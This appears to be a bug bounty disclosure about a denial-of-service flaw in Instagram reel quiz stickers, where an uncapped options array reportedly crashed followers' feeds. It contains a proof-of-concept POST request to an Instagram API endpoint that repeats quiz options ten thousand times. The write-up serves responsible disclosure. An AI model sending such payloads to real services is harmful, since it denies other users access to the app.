Description
On Instagram there is a feature to add stickers on reels, one of the stickers was vulnerable to DoS due to no char limit.
Impact
An attacker could crash the news feed of his followers without any user interaction, resulting in Permanent DoS where the victim can no longer use the Instagram app.Proof of Concept
- Create a reel with a quiz sticker and clone the quiz options to *10000 in the following request
POST
i.instagram.com/api/v1/media/configure_with_clips/
signed_body={"question":"foo","options":[{"text":"bar","count":0},
{"text":"bar","count":0},{"text":"bar","count":0},
{"text":"bar","count":0}*10000]
Timeline
17 June 2022 - Report sent20 June 2022 - Need More Info
28 June 2022 - Triaged
15 July 2022 - $1000 Bounty rewarded by Meta